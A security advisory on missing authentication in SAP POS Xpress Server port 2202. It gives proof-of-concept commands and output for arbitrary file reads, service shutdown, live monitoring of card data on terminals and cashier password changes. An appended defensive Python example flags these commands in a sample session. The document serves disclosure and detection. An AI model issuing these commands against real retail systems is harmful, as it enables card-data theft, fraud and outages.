[ERPSCAN-17-032] SAP POS Missing Authentication in XpressServer
Application: SAP POS Xpress Server
Vendor URL: SAP
Bug: Missing Authentication Check
Reported: 15.05.2017
Vendor response: 16.05.2017
Date of Public Advisory: 11.07.2017
Reference: SAP Security Note 2520064
Author: Vladimir Egorov (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication Check
Impact: broken authentication
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS v3 Base Score: 8.1 / 10
CVSS v3 Base Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AV: Attack Vector (Related exploit range): Network (N)
AC: Attack Complexity (Required attack complexity): High (H)
PR: Privileges Required (Level of privileges needed to exploit): None (N)
UI: User Interaction (Required user participation): None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component): Unchanged (U)
C: Impact to Confidentiality: High (H)
I: Impact to Integrity: High (H)
A: Impact to Availability: High (H)
Description
An attacker can read and clear file content on the SAP POS server, shut down the Xpress Server application, monitor the content shown on POS terminals and brute-force cashiers' logins and passwords.
Business risk
An attacker can use a Missing Authorization Check vulnerability to access a service without any authorization procedures and use service functionality that has restricted access. This can lead to information disclosure, privilege escalation and other attacks.
VULNERABLE PACKAGES
XPRESSBU 1020
XPRESSBU 1030
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2520064.
TECHNICAL DESCRIPTION
An attacker can read and clear file content on the SAP POS server, shut down the Xpress Server application, monitor the content shown on POS terminals and brute-force cashiers' logins and passwords through Xpress Server TCP port 2202 without authentication.
To do so, an attacker connects to the server's port 2202 using telnet. The welcome message shows the Xpress Server's version and name. The "Help" command lists some of the possible actions:
    999 *** XPRESS SERVER MOST COMMON COMMAND HELP ***
    999 MONXPS [ON|OFF]
    999 [SHOWTERM|TERMINAL-STATUS] [ALL|Term#]
    999 [MONTERM|MONITOR-TERMINAL] [ALL|XPS|Term#] [START|STOP|ON|OFF]
    999 OPEN-TERMINAL [ALL|Term#]
    999 OPEN-STORE [TODAY|NumberOfSecsSinceJan1-1970]
    999 CLOSE-TERMINAL [ALL|Term#] [FORCE|NO-FORCE|ABORT]
    999 TERMINAL-BALANCE [Term#] [BAL|UNBAL]
    999 CASHIER-BALANCE [Cashier#] [1|2|3] [ShortOver Amount] [netTenderTotal] <-- 1=BALANCED 2=UNBALANCED 3=PREVIOUS BALANCE NOW OUT OF DATE
    999 UPDATE-CASHIER [Cashier#]
    999 DELETE-CASHIER [Cashier#]
    999 END-OF-DAY [FORCE|NO-FORCE|ABORT]
    999 STORE-TOTALS [CLOSE-DAY|CLOSE-WEEK|CLOSE-PERIOD|DONE-END-OF-DAY|...]
    999 STORE-TOTALS CONSOL-DAY [RTOT|SRTOT|CTOT|SPROD|...]
    999 COMMS-RESET [1|2|3] <-- 1=ALL 2=REMOTE 3=MODEMS
    999 FLUSH-PLUCACHE
    999 TRIGGER-NEWPROMOS
    999 SHUTDOWN
    999 . <-- Use to repeat previous command
The Help output is not complete; there are additional commands that it does not list:
    APM-validate-Passwd
    APM-Reset-Passwd
    FILE-OPEN [file-path] [mode]
    FILE-FIND [file_path]
    FILE-READ [file_id] [buff_size]
    FILE-SEEK [file_id] [offset] [origin]
    FILE-TELL [file_id]
The most critical commands are provided below.
SHOWTERM
Shows the active and inactive terminals of the system and the Backup Server, including the store number, the terminal number, and the signed-on cashier and cashier number.
PoC
    SHOWTERM ALL
    100 0 0 STORE-OPEN BACKUP SERVER: NOT CONNECTED
    100 1 0 01 CASHIER 1111
    100 9999 0 END-OF-TERMINAL-STATUS
MONTERM
Lets the user monitor everything that appears on the receipt window of the POS terminal, including card data.
PoC
    MONTERM 1
    102 1 SALESPERSON # 1111
    102 1 POTTERS BRANDY 1.75L 1000 p1.00 L
    102 1 REGULAR PRICE 12.99
    102 1 SUBTOTAL $1.00
    102 1 5% LOCAL TAX $0.05
    102 1 T O T A L $1.05
    102 1 V I S A $1.05
    102 1 4***********1111
    102 1 PURCHASE
    102 1 KEYED
    102 1 LOCAL
    102 1 AUTH#
    102 1 LOCAL
    102 1 INVOICE #: 405
    102 1 2017-04-02 20:26:09
    102 1 CUSTOMER ZIP CODE 1111111111
    102 1 ITEMS 1
    102 1 2017-04-02 20:26:10
    102 1 000001 01 1111 0405
    102 1 ------------------------------------------
RUNEOD AND TERMACTION
Initiate End of Day processing and sign the cashier off from the POS terminal.
PoC
    RUNEOD 0 1001 1
    TERMACTION 1 1002 0 ACTION=Signoff;Term=1;
SHUTDOWN
Shuts down the Xpress Server application.
PoC
    SHUTDOWN
    Connection closed by foreign host.
APM-VALIDATE-PASSWD
Changes the current cashier's password to a new one (the current password has to be validated first).
PoC
    APM-Validate-Passwd 0 1124 1 1111;1234567a   # Validate the current password
    1124 0 1 1 Disp=Authenticated;APMCode=0;
    APM-Reset-Passwd 0 1125 1 1111;7654321a      # If all is ok, change the password to the new one
    1125 0 1 1 Disp=Authenticated;APMCode=0;
    UPDATE-CASHIER 1111                          # Apply the new setting in the database
    170 CASHIER-UPDATED 1111
    Audit-Modify-Emp-Passwd 1111 1111            # ???
FILE-OPEN AND FILE-READ
Read data from any file on the server.
PoC
    FILE-OPEN C:\windows\win.ini
    160 FILE-OPEN 0
    FILE-READ 0 120
    162 FILE-READ 0 120
    EGVideo
    m4v=MPEGVideo
    mod=MPEGVideo
    mov=MPEGVideo
    mp4=MPEGVideo
    mp4v=MPEGVideo
    mts=MPEGVideo
    ts=MPEGVideo
    tts=MPEGVideo
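Because port 2202 accepts these commands without any authentication, the only signal a defender has until the note is applied is the command stream itself. The following is an added example (not part of this advisory or of SAP's software) that takes the client side of a port-2202 session, as a network sensor might reconstruct it, and flags the commands documented above; the risk labels, the brute-force threshold and the sample session are this example's own assumptions.

```python
from collections import Counter

# Xpress Server commands whose unauthenticated use is documented in the advisory.
# The risk labels are this example's own wording, not a SAP classification.
HIGH_RISK = {
    "FILE-OPEN": "arbitrary file read on the server",
    "FILE-READ": "arbitrary file read on the server",
    "SHUTDOWN": "denial of service of Xpress Server",
    "APM-RESET-PASSWD": "cashier password change",
    "MONTERM": "live monitoring of terminal receipt windows (card data)",
    "RUNEOD": "forced End of Day",
    "TERMACTION": "remote terminal sign-off",
}
BRUTE_FORCE_CMD = "APM-VALIDATE-PASSWD"

# Constructed sample: client lines sent to TCP port 2202, one command per line.
# Not a real capture; it mirrors the command formats shown in the advisory.
SAMPLE_SESSION = """\
Help
SHOWTERM ALL
MONTERM 1
APM-Validate-Passwd 0 1124 1 1111;aaaaaaaa
APM-Validate-Passwd 0 1124 1 1111;bbbbbbbb
APM-Validate-Passwd 0 1124 1 1111;cccccccc
FILE-OPEN C:\\windows\\win.ini
FILE-READ 0 120
SHUTDOWN
"""

def parse_command(line):
    """Split one client line into (COMMAND, args); command names are case-insensitive."""
    parts = line.strip().split()
    if not parts:
        return None
    return parts[0].upper(), parts[1:]

def analyse_session(text, brute_threshold=3):
    """Return (command, reason) findings for one client session, in order seen."""
    findings = []
    validate_per_cashier = Counter()
    for line in text.splitlines():
        parsed = parse_command(line)
        if parsed is None:
            continue
        cmd, args = parsed
        if cmd in HIGH_RISK:
            findings.append((cmd, HIGH_RISK[cmd]))
        elif cmd == BRUTE_FORCE_CMD and args:
            # Last argument is "cashier#;password": count attempts per cashier,
            # and never keep the password itself in the finding.
            cashier = args[-1].split(";", 1)[0]
            validate_per_cashier[cashier] += 1
            if validate_per_cashier[cashier] == brute_threshold:
                findings.append((cmd, f"{brute_threshold} password checks for cashier {cashier}"))
    return findings
```

Any finding from a host that is not a known POS terminal or store controller is worth an alert, since legitimate clients should never reach this port from elsewhere.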